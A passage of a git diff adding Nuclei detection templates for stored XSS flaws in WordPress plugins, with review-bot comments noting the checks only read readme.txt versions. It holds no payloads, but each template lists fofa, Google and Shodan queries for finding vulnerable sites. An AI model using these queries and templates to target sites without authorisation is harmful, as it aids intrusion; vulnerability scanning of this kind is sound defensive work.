@@ -0,0 +1,59 @@ +id: CVE-2024-11827-1cfd9f40aa296523889f437bba603561 + +info: + name: > + Out of the Block: OpenStreetMap <= 2.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via ootb_query Shortcode + author: topscoder + severity: low + description: > + The Out of the Block: OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ootb_query shortcode in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c958e-1ab2-498c-b665-73e239d0029b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11827 + metadata: + fofa-query: "wp-content/plugins/ootb-openstreetmap/" + google-query: inurl:"/wp-content/plugins/ootb-openstreetmap/" + shodan-query: 'vuln:CVE-2024-11827' + tags: cve,wordpress,wp-plugin,ootb-openstreetmap,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ootb-openstreetmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ootb-openstreetmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11832.yaml b/poc/cve/CVE-2024-11832.yaml new file mode 100644 index 0000000000..dcbb4630ba 
--- /dev/null +++ b/poc/cve/CVE-2024-11832.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11832-ce764e7c1b8ba11b8ae5c2880094a1b5 + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JavaScript row settings in all versions up to, and including, 2.8.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11832 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-11832' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11841.yaml b/poc/cve/CVE-2024-11841.yaml new file mode 100644 index 0000000000..3701a028c4 --- /dev/null +++ b/poc/cve/CVE-2024-11841.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11841-f3a00a85c2a669580537ad1d561981fa + +info: + name: > + Tithe.ly Giving Button <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tithe.ly Giving Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/569f2250-971a-4000-9114-67e609ec907d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11841 + metadata: + fofa-query: "wp-content/plugins/wp-tithely/" + google-query: inurl:"/wp-content/plugins/wp-tithely/" + shodan-query: 'vuln:CVE-2024-11841' + tags: cve,wordpress,wp-plugin,wp-tithely,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-tithely/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-tithely" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml b/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml
new file mode 100644
index 0000000000..74cd0f9c53
--- /dev/null
+++ b/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d
+
+info:
+ name: >
+ Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Koalendar – Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘height’ parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11855
+ metadata:
+ fofa-query: "wp-content/plugins/koalendar-free-booking-widget/"
+ google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/"
+ shodan-query: 'vuln:CVE-2024-11855'
+ tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "koalendar-free-booking-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
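Review bot: Nothing in the template tells the reader that a match is a version inference only: the request reads `readme.txt` and the `dsl` matcher compares the extracted `Stable tag` with `<= 1.0.2`, so the stored XSS itself is never checked, and a patched plugin with an unchanged readme would still be reported. The regex captures only `[0-9.]+`, so a readme whose stable tag is not numeric (for example `trunk`) would not be captured and the site would presumably go unreported. I would add a comment above `http:` such as `# Version check only (readme.txt "Stable tag"); confirm the installed plugin version before treating a hit as vulnerable.` The other templates in this part of the patch use the same request and matchers.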
diff --git a/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml b/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml
new file mode 100644
index 0000000000..75cd3bd028
--- /dev/null
+++ b/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324
+
+info:
+ name: >
+ Tabs Maker <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Tabs Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on tab descriptions. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/284c5646-7728-45bd-9479-483c806ca804?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11865
+ metadata:
+ fofa-query: "wp-content/plugins/tabs-maker/"
+ google-query: inurl:"/wp-content/plugins/tabs-maker/"
+ shodan-query: 'vuln:CVE-2024-11865'
+ tags: cve,wordpress,wp-plugin,tabs-maker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tabs-maker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tabs-maker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
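Review bot: The `word` matcher requires the directory slug `tabs-maker` to appear literally in the body of `readme.txt`, although the request path already selects that directory; a readme that uses only the display name would fail this matcher even when the version check passes, and the install would be missed. If the intent is to reject soft-404 pages that answer 200, matching on text the extractor already depends on is safer, for example `- "Stable tag:"` under `words`. Whether the shipped readme contains the slug cannot be told from the hunk, so this is worth checking against the real file before merging.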
diff --git a/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml b/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml
new file mode 100644
index 0000000000..938460803e
--- /dev/null
+++ b/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53
+
+info:
+ name: >
+ Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Companion Portfolio – Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11867
+ metadata:
+ fofa-query: "wp-content/plugins/companion-portfolio/"
+ google-query: inurl:"/wp-content/plugins/companion-portfolio/"
+ shodan-query: 'vuln:CVE-2024-11867'
+ tags: cve,wordpress,wp-plugin,companion-portfolio,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "companion-portfolio"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml b/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml
new file mode 100644
index 0000000000..bbbe0e8e1e
--- /dev/null
+++ b/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11869-50ed005605a356d0d3b23edb855715d9
+
+info:
+ name: >
+ Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11869
+ metadata:
+ fofa-query: "wp-content/plugins/buk-appointments/"
+ google-query: inurl:"/wp-content/plugins/buk-appointments/"
+ shodan-query: 'vuln:CVE-2024-11869'
+ tags: cve,wordpress,wp-plugin,buk-appointments,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "buk-appointments"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml b/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml
new file mode 100644
index 0000000000..62cb7587e5
--- /dev/null
+++ b/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f
+
+info:
+ name: >
+ glomex oEmbed <= 0.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The glomex oEmbed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glomex_integration' shortcode in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11873
+ metadata:
+ fofa-query: "wp-content/plugins/glomex-oembed/"
+ google-query: inurl:"/wp-content/plugins/glomex-oembed/"
+ shodan-query: 'vuln:CVE-2024-11873'
+ tags: cve,wordpress,wp-plugin,glomex-oembed,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/glomex-oembed/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "glomex-oembed"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.9.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml b/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml
new file mode 100644
index 0000000000..cf0473032b
--- /dev/null
+++ b/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83
+
+info:
+ name: >
+ Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site <= 1.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kredeum_opensky' shortcode in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11876
+ metadata:
+ fofa-query: "wp-content/plugins/kredeum-nfts/"
+ google-query: inurl:"/wp-content/plugins/kredeum-nfts/"
+ shodan-query: 'vuln:CVE-2024-11876'
+ tags: cve,wordpress,wp-plugin,kredeum-nfts,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kredeum-nfts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kredeum-nfts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml b/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml
new file mode 100644
index 0000000000..61c9171a21
--- /dev/null
+++ b/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca
+
+info:
+ name: >
+ Cricket Live Score <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Cricket Live Score plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cricket_score' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11877
+ metadata:
+ fofa-query: "wp-content/plugins/cricket-score/"
+ google-query: inurl:"/wp-content/plugins/cricket-score/"
+ shodan-query: 'vuln:CVE-2024-11877'
+ tags: cve,wordpress,wp-plugin,cricket-score,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cricket-score/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cricket-score"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml b/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml
new file mode 100644
index 0000000000..a3d18981de
--- /dev/null
+++ b/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11879-59310d2dceea2163a5176b76507b44eb
+
+info:
+ name: >
+ Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Stripe Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stripe_donation' shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a028937-38bb-4c28-aaa1-60a86124c998?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11879
+ metadata:
+ fofa-query: "wp-content/plugins/bin-stripe-donation/"
+ google-query: inurl:"/wp-content/plugins/bin-stripe-donation/"
+ shodan-query: 'vuln:CVE-2024-11879'
+ tags: cve,wordpress,wp-plugin,bin-stripe-donation,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bin-stripe-donation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml b/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml
new file mode 100644
index 0000000000..28dc3ec7f2
--- /dev/null
+++ b/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849
+
+info:
+ name: >
+ Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11883
+ metadata:
+ fofa-query: "wp-content/plugins/connatix-video-embed/"
+ google-query: inurl:"/wp-content/plugins/connatix-video-embed/"
+ shodan-query: 'vuln:CVE-2024-11883'
+ tags: cve,wordpress,wp-plugin,connatix-video-embed,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "connatix-video-embed"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml b/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml
new file mode 100644
index 0000000000..6608aef020
--- /dev/null
+++ b/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11884-55f612c1021e30ed6e11056cd7729031
+
+info:
+ name: >
+ Wp photo text slider 50 <= 8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Wp photo text slider 50 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-photo-slider' shortcode in all versions up to, and including, 8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f98f11da-b0ae-4c00-9708-88d6044abda2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11884
+ metadata:
+ fofa-query: "wp-content/plugins/wp-photo-text-slider-50/"
+ google-query: inurl:"/wp-content/plugins/wp-photo-text-slider-50/"
+ shodan-query: 'vuln:CVE-2024-11884'
+ tags: cve,wordpress,wp-plugin,wp-photo-text-slider-50,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-photo-text-slider-50/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-photo-text-slider-50"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml b/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml
new file mode 100644
index 0000000000..ecfb53fff5
--- /dev/null
+++ b/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1
+
+info:
+ name: >
+ IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The IDer Login for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ider_login_button' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11888
+ metadata:
+ fofa-query: "wp-content/plugins/ider-login/"
